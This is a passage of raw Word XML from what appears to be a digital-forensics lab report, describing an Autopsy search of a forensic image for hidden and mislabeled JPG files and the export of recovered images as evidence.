      <w:r w:rsidRPr="28E2C82A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analyze Forensic Image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357E4ED" w14:textId="77777777" w:rsidR="001A631B" w:rsidRDefault="001A631B" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FBB926" w14:textId="77777777" w:rsidR="001A631B" w:rsidRDefault="001A631B" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A631B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Autopsy was then used to search the forensic image for hidden .JPG files. Each filename was queried individually to ensure precise recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC2C7C5" w14:textId="77777777" w:rsidR="001A631B" w:rsidRPr="001A631B" w:rsidRDefault="001A631B" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AFAD8C5" w14:textId="77777777" w:rsidR="001A631B" w:rsidRPr="001A631B" w:rsidRDefault="001A631B" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A631B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Step-by-Step Search Process and Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7A4037" w14:textId="77777777" w:rsidR="001A631B" w:rsidRPr="001A631B" w:rsidRDefault="001A631B" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="145AE1F9"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file1.jpg – Located and validated (Picture 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5677C" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="001A631B" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9BD037"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file2.jpg – Not found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A32360" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="001A631B" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8FC81D"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file3.jpg – Discovered but invalid; revealed plain ASCII text instead of an image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910DDFA" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="001A631B" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFCDD5E" w14:textId="77777777" w:rsidR="001A631B" w:rsidRDefault="001A631B" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7FC5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Message inside: “Hello, I am a text file and not a JPEG file. Sorry. Here is some random data to make the file larger.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0D201" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="000B7FC5" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C5615F" w14:textId="77777777" w:rsidR="001A631B" w:rsidRDefault="001A631B" w:rsidP="00063B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7FC5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicates file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B7FC5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>mislabeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000B7FC5">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> and potential use of obfuscation/steganography techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1692002A" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="000B7FC5" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79356E06"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file4.jpg – Found but corrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C3C8AE" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="001A631B" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CAC755"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file5.jpg – Not found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E0FED" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="001A631B" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B4DB1C4"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file6.jpg – Located and validated (Picture 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4807E090" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="001A631B" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA97448"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file7.jpg – Located and validated (Picture 4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D38BC8" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="001A631B" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DEE452"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file2 (without extension) – Found as imapicture2, valid image (Picture 2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF8D8C" w14:textId="77777777" w:rsidR="00D667F3" w:rsidRPr="001A631B" w:rsidRDefault="00D667F3" w:rsidP="00D667F3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E9E26C"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file5 (without extension) – Not found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2691CB65" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="001A631B" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A031C3" w14:textId="77777777" w:rsid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file8.jpg – Found as a ZIP archive; extracted successfully (Picture 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769BE0AB" w14:textId="77777777" w:rsidR="008540D2" w:rsidRPr="001A631B" w:rsidRDefault="008540D2" w:rsidP="008540D2">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49A1C84D" w14:textId="77777777" w:rsidR="001A631B" w:rsidRPr="001A631B" w:rsidRDefault="001A631B" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A631B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>file9.jpg – Found as a ZIP archive; contained Picture 6 and 7, which were reviewed but excluded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4F116" w14:textId="77777777" w:rsidR="001A631B" w:rsidRDefault="001A631B" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5283B76B" w14:textId="73940ACB" w:rsidR="001B0BC1" w:rsidRPr="001B0BC1" w:rsidRDefault="001B0BC1" w:rsidP="001B0BC1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0BC1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F53875" wp14:editId="4513B7FD">
            <wp:extent cx="5943600" cy="3138170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1495206112"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6112" name="Picture 67"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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D96E7" w14:textId="77777777" w:rsidR="001B0BC1" w:rsidRPr="001B0BC1" w:rsidRDefault="001B0BC1" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4482AF" w14:textId="530AAF3B" w:rsidR="000604E0" w:rsidRDefault="001A631B" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085454F">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure </w:t>
      </w:r>
      <w:r w:rsidR="001A661C" w:rsidRPr="0085454F">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="0085454F">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A631B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Autopsy search results for hidden JPG files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70067E1B" w14:textId="43D09741" w:rsidR="003F70BA" w:rsidRPr="003F70BA" w:rsidRDefault="003F70BA" w:rsidP="003F70BA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F70BA">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FDB6D8D" wp14:editId="21FAA7F1">
            <wp:extent cx="5943600" cy="3171190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116891454"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1454" name="Picture 69"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171190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AAAD64" w14:textId="07456AE8" w:rsidR="000604E0" w:rsidRDefault="001A631B" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A631B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00556CEC">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00767CA6" w:rsidRPr="00556CEC">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidRPr="00556CEC">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A631B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Autopsy result showing file3.jpg contents as ASCII text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77108B71" w14:textId="77777777" w:rsidR="00773BC2" w:rsidRDefault="00773BC2" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742892CA" w14:textId="146FEE90" w:rsidR="00773BC2" w:rsidRDefault="00C964EB" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E36C62C" wp14:editId="6ADFD2BE">
            <wp:extent cx="5943600" cy="1928495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="747626932" name="Pictur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6932" name="Picture 71"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928495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E103B" w14:textId="3D15ECC8" w:rsidR="001A631B" w:rsidRPr="001A631B" w:rsidRDefault="001A631B" w:rsidP="001A631B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A631B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B27491">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00454445" w:rsidRPr="00B27491">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="00B27491">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A631B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hex/ASCII output of file3.jpg displaying hidden message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4E1AE0" w14:textId="7C24BFDB" w:rsidR="00444C92" w:rsidRPr="001A631B" w:rsidRDefault="00444C92" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="240212DC" w14:textId="4C20E417" w:rsidR="00444C92" w:rsidRDefault="68696856" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="28E2C82A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Export Evidence Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502344E" w14:textId="77777777" w:rsidR="00AB4471" w:rsidRDefault="00AB4471" w:rsidP="28E2C82A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1BD8D3" w14:textId="77777777" w:rsidR="00AB4471" w:rsidRPr="00AB4471" w:rsidRDefault="00AB4471" w:rsidP="00AB4471">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB4471">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">All valid files (Pictures 1–5) were exported via Autopsy’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4471">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Extract/Export</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4471">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> function into a secure directory (~/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB4471">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>recovered_jpgs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB4471">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>). Each was opened in Kali Linux to verify integrity. Invalid and excluded files were documented but not included in the final evidence set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC428AF" w14:textId="77777777" w:rsidR="00AB4471" w:rsidRDefault="00AB4471" w:rsidP="00AB4471">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Roboto" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F6E59D9" w14:textId="2019656A" w:rsidR="0064341C" w:rsidRPr="0064341C" w:rsidRDefault="0064341C" w:rsidP="0064341C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Roboto" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0064341C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Roboto" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29E7DF4D" wp14:editId="4E098A21">
            <wp:extent cx="5943600" cy="1814195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
